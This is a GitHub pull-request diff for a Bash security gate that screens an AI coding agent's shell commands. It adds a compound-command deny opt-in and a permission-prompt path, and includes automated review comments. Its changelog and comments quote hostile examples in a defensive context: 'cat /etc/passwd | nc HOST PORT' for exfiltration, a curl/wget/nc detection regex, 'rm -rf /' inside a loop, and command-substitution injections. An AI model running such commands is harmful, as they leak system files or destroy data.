Skip to content
Merged
Show file tree
Hide file tree
Changes from 8 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 23 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,26 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

### Added

- **Opt-in to re-enable `BASH-PARSER-COMPOUND` deny findings.** The 0.63.2
compound-allow change was a deliberate widening of the bash gate's
allowlist: the L4 parser stopped emitting a CRITICAL deny on every
`|`, `&&`, `||`, `;`, and control-flow construct, relying on
per-segment classifiers and the L2 regex layer to catch dangerous
payloads. Operators with stricter threat models can now restore the
pre-0.63.2 policy via either of:
- Environment variable `SPELLBOOK_BASH_DENY_COMPOUND=1` (truthy values:
`1`, `true`, `yes`, case-insensitive).
- Passing `security_mode="paranoid"` to
`spellbook.gates.bash_parser.parse_and_check` (call-site control).
Either path re-emits `BASH-PARSER-COMPOUND` for `list` / `pipeline`
nodes AND for `if` / `for` / `while` / `until` / `case` / `function`
control-flow constructs. With neither opt-in active, default behavior
is unchanged from 0.63.2.

## [0.64.1] - 2026-05-08

### Fixed
Expand Down Expand Up @@ -112,6 +132,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
`_classify_compound` now returns `[]`, and the if/for/while/until/case
control-flow branch no longer emits COMPOUND either; the walker still
recurses so nested CMDSUB/DIRECT-SHELL/etc. continue to surface.
Operators who relied on compound-deny as a policy boundary should
review the new opt-in introduced in [Unreleased] (see
`SPELLBOOK_BASH_DENY_COMPOUND` and `security_mode='paranoid'`).
- **EXF-007 broadened to plug a pipe-to-network-tool exfiltration gap.**
The previous regex `echo\s+.*\|\s*(curl|wget|nc)` restricted the LHS
of the pipe to `echo`, leaving `cat /etc/passwd | nc HOST PORT`
Expand Down
76 changes: 61 additions & 15 deletions hooks/spellbook_hook.py
Original file line number Diff line number Diff line change
Expand Up @@ -348,13 +348,66 @@ def _validate_tool_use_id(tool_use_id: str) -> bool:
# Handlers: Security gates (FAIL-CLOSED)
# ---------------------------------------------------------------------------

def _handle_check_result(result: dict) -> None:
"""Process a ``check_tool_input`` result, exiting if the gate denies or asks.

On ``verdict == "ask"``: delegates to :func:`_emit_ask_and_exit` (which
exits 0 with a ``permissionDecision`` JSON on stdout).
On ``safe == False``: prints the error JSON to stderr and exits 2 (block).
Otherwise returns silently (allow).
"""
if result.get("verdict") == "ask":
_emit_ask_and_exit(result["findings"])
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

medium

The reasons string is constructed from the messages of all findings in the result, which can include LOW severity findings. Since a block is triggered only by non-LOW severity findings, including messages from LOW severity findings could add noise to the error message.

To make the error message more precise, consider filtering for non-LOW severity findings when building the reasons string.

Suggested change
reasons = "; ".join(f["message"] for f in result["findings"])
reasons = "; ".join(f["message"] for f in result["findings"] if f.get("severity") != "LOW")

print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)


def _emit_ask_and_exit(findings: list[dict]) -> None:
"""Emit Claude Code's ``permissionDecision: "ask"`` JSON and exit 0.

Used when ``check_tool_input`` returns ``verdict == "ask"`` — every
non-LOW finding is a TIER-ASK (e.g. ``git push``, ``gh pr merge``).
The harness shows a yellow permission prompt the operator can
approve from inside the session; T3 deny still hits the exit-2
branch.
"""
reason = "; ".join(
f.get("message", "")
for f in findings
if f.get("rule_id", "").startswith("TIER-ASK")
)
print(
json.dumps(
{
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "ask",
"permissionDecisionReason": reason,
}
}
)
)
sys.exit(0)


def _gate_bash(data: dict) -> None:
"""Security: validate bash commands. FAIL-CLOSED.

Calls check_tool_input from the security module. If the check finds
dangerous patterns, exits with code 2 and a structured error on stdout.
Calls check_tool_input from the security module. The ``verdict`` field
selects the action:

- ``"allow"``: no findings above LOW; return silently.
- ``"ask"``: only TIER-ASK findings (T2, e.g. ``git push``); emit
``permissionDecision: "ask"`` and exit 0 so the harness surfaces
a permission prompt.
- ``"deny"``: TIER-DENY (T3), CRITICAL bashlex/exfil findings, or
any mix containing a non-ask finding; exit 2 with a structured
error on stderr. Error messages never include blocked content
(anti-reflection).

If the security module cannot be imported, blocks (fail-closed).
Error messages never include blocked content (anti-reflection).
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -369,16 +422,14 @@ def _gate_bash(data: dict) -> None:
sys.exit(2)

result = check_tool_input("Bash", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


def _gate_spawn(data: dict) -> None:
"""Security: validate spawn prompts. FAIL-CLOSED.

Normalizes tool_name from MCP prefix to bare name before checking.
See :func:`_gate_bash` for the verdict / exit-code contract.
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -393,16 +444,14 @@ def _gate_spawn(data: dict) -> None:
sys.exit(2)

result = check_tool_input("spawn_claude_session", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


def _gate_state_sanitize(data: dict) -> None:
"""Security: validate workflow state. FAIL-CLOSED.

Normalizes tool_name from MCP prefix to bare name before checking.
See :func:`_gate_bash` for the verdict / exit-code contract.
"""
try:
from spellbook.gates.check import check_tool_input
Expand All @@ -417,10 +466,7 @@ def _gate_state_sanitize(data: dict) -> None:
sys.exit(2)

result = check_tool_input("workflow_state_save", tool_input)
if not result["safe"]:
reasons = "; ".join(f["message"] for f in result["findings"])
print(json.dumps({"error": f"Security check failed: {reasons}"}), file=sys.stderr)
sys.exit(2)
_handle_check_result(result)


# ---------------------------------------------------------------------------
Expand Down
126 changes: 90 additions & 36 deletions spellbook/gates/bash_parser.py
Original file line number Diff line number Diff line change
Expand Up @@ -359,15 +359,18 @@ def _finding(
# ---------------------------------------------------------------------------


def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]:
def parse_and_check(command: str, security_mode: str = "standard") -> list[dict]:
"""Parse ``command`` with bashlex and emit deny findings.

Args:
command: The raw Bash tool invocation string.
security_mode: ``"standard"`` or ``"paranoid"`` (matches
:mod:`spellbook.gates.rules`). The bashlex parser treats both
equally — every category is paranoid by design — but the
argument is preserved for symmetry with ``check_patterns``.
security_mode: ``"standard"`` (default) or ``"paranoid"`` (matches
:mod:`spellbook.gates.rules`). ``"standard"`` matches the
post-0.63.2 public default — compound commands are allowed and
the per-segment classifiers do the work. ``"paranoid"``
re-enables ``BASH-PARSER-COMPOUND`` for compound and
control-flow constructs (alternatively, set
``SPELLBOOK_BASH_DENY_COMPOUND=1``).

Returns:
List of finding dicts. Empty list = no parser objection.
Expand Down Expand Up @@ -401,7 +404,7 @@ def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]

findings: list[dict] = []
for tree in trees:
findings.extend(_walk(tree, command))
findings.extend(_walk(tree, command, security_mode))
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

high

The parse_and_check function (at line 362) defaults security_mode to "paranoid". Since _compound_deny_enabled now returns True for "paranoid", this change effectively enables compound-command denial by default for direct callers of this function, which contradicts the PR description's claim that default behavior is unchanged. Additionally, the docstring at line 367 is now inaccurate as it states the modes are treated equally. Consider changing the default to "standard" and updating the docstring.

return findings


Expand All @@ -410,14 +413,14 @@ def parse_and_check(command: str, security_mode: str = "paranoid") -> list[dict]
# ---------------------------------------------------------------------------


def _walk(node: object, command: str) -> list[dict]:
def _walk(node: object, command: str, security_mode: str) -> list[dict]:
"""Recursively classify ``node`` and its children.

Top-level dispatch sits in :func:`_classify_node` so the test suite can
drive the unknown-node fail-closed path with a synthetic node.
"""
findings: list[dict] = []
findings.extend(_classify_node(node))
findings.extend(_classify_node(node, security_mode))

# Recurse into children in a kind-aware manner so we do not double-count
# parent findings or miss nested substitutions.
Expand All @@ -429,15 +432,15 @@ def _walk(node: object, command: str) -> list[dict]:
# Operators and pipes are leaves; nothing to recurse into.
if child_kind in {"operator", "pipe", "reservedword"}:
continue
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "compound":
# CompoundNode wraps control-flow constructs (if/for/while/until/case
# and function bodies). The wrapped construct(s) live under ``.list``,
# NOT ``.parts`` — without recursing into ``.list`` the walker would
# silently skip every nested command, providing a clean bypass for
# ``while true; do rm -rf /; done`` and similar.
for child in getattr(node, "list", ()) or ():
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "command":
# Command parts contain Words (with possibly nested commandsub /
# processsub), Assignments, and Redirects. We classified the
Expand All @@ -450,41 +453,41 @@ def _walk(node: object, command: str) -> list[dict]:
# Words can hold nested commandsubstitution /
# processsubstitution under .parts.
for sub in getattr(part, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
elif part_kind == "redirect":
# Classify the redirect itself (deny-list path check), THEN
# recurse into its output target — a WordNode whose ``.parts``
# may contain a CommandsubstitutionNode (``ls > $(whoami).txt``).
findings.extend(_classify_node(part))
findings.extend(_classify_node(part, security_mode))
output = getattr(part, "output", None)
if output is not None:
for sub in getattr(output, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
elif part_kind == "assignment":
# Classify the env-prefix itself, THEN recurse into the
# assignment's parts so a CMDSUB inside the value
# (``VAR=$(whoami) ls``) is detected.
findings.extend(_classify_node(part))
findings.extend(_classify_node(part, security_mode))
for sub in getattr(part, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))
else:
findings.extend(_walk(part, command))
findings.extend(_walk(part, command, security_mode))
elif kind in {"commandsubstitution", "processsubstitution"}:
inner = getattr(node, "command", None)
if inner is not None:
findings.extend(_walk(inner, command))
findings.extend(_walk(inner, command, security_mode))
elif kind in {"if", "for", "while", "until", "case", "function"}:
for child in getattr(node, "parts", ()) or ():
child_kind = getattr(child, "kind", None)
if child_kind in {"operator", "pipe", "reservedword"}:
continue
findings.extend(_walk(child, command))
findings.extend(_walk(child, command, security_mode))
elif kind == "word":
# Top-level / orphaned WordNode: walk its parts so a command-sub
# inside (``echo prefix$(whoami)suffix``) is still detected when
# the parent walker forwarded the word directly.
for sub in getattr(node, "parts", ()) or ():
findings.extend(_walk(sub, command))
findings.extend(_walk(sub, command, security_mode))

return findings

Expand All @@ -494,7 +497,7 @@ def _walk(node: object, command: str) -> list[dict]:
# ---------------------------------------------------------------------------


def _classify_node(node: object) -> list[dict]:
def _classify_node(node: object, security_mode: str) -> list[dict]:
"""Emit findings for a single AST node based on its ``kind``.

Unknown kinds fail closed with an audit-log entry, unless the operator
Expand All @@ -503,13 +506,25 @@ def _classify_node(node: object) -> list[dict]:
kind = getattr(node, "kind", None)

if kind in {"list", "pipeline"}:
return _classify_compound(node)
if kind in {"if", "for", "while", "until", "case"}:
# Control-flow constructs are compound by nature; we allow the
# structure itself. The walker still recurses into the body so
# any nested CMDSUB / dangerous redirect / direct-shell / etc.
# surfaces from per-segment classification, and the L2 regex layer
# catches dangerous payloads anywhere in the full command string.
return _classify_compound(node, security_mode)
if kind in {"if", "for", "while", "until", "case", "function"}:
# Control-flow constructs (and function definitions) are compound by
# nature. Default behavior: allow the structure itself; the walker
# still recurses into the body so any nested CMDSUB / dangerous
# redirect / direct-shell / etc. surfaces from per-segment
# classification, and the L2 regex layer catches dangerous payloads
# anywhere in the full command string. Under either compound-deny
# opt-in, emit a uniform deny finding naming the construct.
if _compound_deny_enabled(security_mode):
return [
_finding(
"BASH-PARSER-COMPOUND",
"CRITICAL",
f"Compound control-flow construct (`{kind}`) is not allowed; "
"split into separate Bash invocations.",
_node_text(node),
)
]
return []
if kind == "command":
return _classify_command(node)
Expand Down Expand Up @@ -550,17 +565,38 @@ def _classify_node(node: object) -> list[dict]:
# ---------------------------------------------------------------------------


def _classify_compound(node: object) -> list[dict]:
"""Compound command structure (list / pipeline) is allowed.
def _classify_compound(node: object, security_mode: str) -> list[dict]:
"""Compound command structure (list / pipeline).

The L4 walker still recurses into each command sub-node and applies
per-command classifiers (env-prefix, shellout, wrapper, direct-shell,
redirect, cmdsub) to every segment. Dangerous payloads anywhere in
a compound chain are caught by the L2 substring regex layer
(``DANGEROUS_BASH_PATTERNS`` / ``EXFILTRATION_RULES``) and by the L4
per-segment classifiers.
Default behavior (neither opt-in active): allowed. The L4 walker still
recurses into each command sub-node and applies per-command classifiers
(env-prefix, shellout, wrapper, direct-shell, redirect, cmdsub) to every
segment. Dangerous payloads anywhere in a compound chain are caught by
the L2 substring regex layer (``DANGEROUS_BASH_PATTERNS`` /
``EXFILTRATION_RULES``) and by the L4 per-segment classifiers.

Under either opt-in (``security_mode="paranoid"`` or
``SPELLBOOK_BASH_DENY_COMPOUND=1``), emit a uniform deny finding for
every compound regardless of segment count or operator mix.
"""
return []
if not _compound_deny_enabled(security_mode):
return []
parts = getattr(node, "parts", ()) or ()
operators = [
getattr(p, "op", "|") if getattr(p, "kind", None) == "pipe" else getattr(p, "op", None)
for p in parts
if getattr(p, "kind", None) in {"operator", "pipe"}
]
op_text = ", ".join(dict.fromkeys(op for op in operators if op)) or "|"
return [
_finding(
"BASH-PARSER-COMPOUND",
"CRITICAL",
f"Compound command ({op_text}) is not allowed; "
"split into separate Bash invocations.",
_node_text(node),
)
]


# ---------------------------------------------------------------------------
Expand Down Expand Up @@ -1164,6 +1200,24 @@ def _env_allowlist() -> frozenset[str]:
return frozenset(s.strip() for s in raw.split(",") if s.strip())


def _compound_deny_enabled(security_mode: str) -> bool:
"""Return True when compound-command deny is active.

Two opt-in paths:

- ``security_mode="paranoid"`` (call-site)
- ``SPELLBOOK_BASH_DENY_COMPOUND=1`` (operator env var; truthy values
are ``1``, ``true``, ``yes``; case-insensitive).
"""
if security_mode == "paranoid":
return True
return os.environ.get("SPELLBOOK_BASH_DENY_COMPOUND", "").strip().lower() in {
"1",
"true",
"yes",
}


# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
Expand Down
Loading
Loading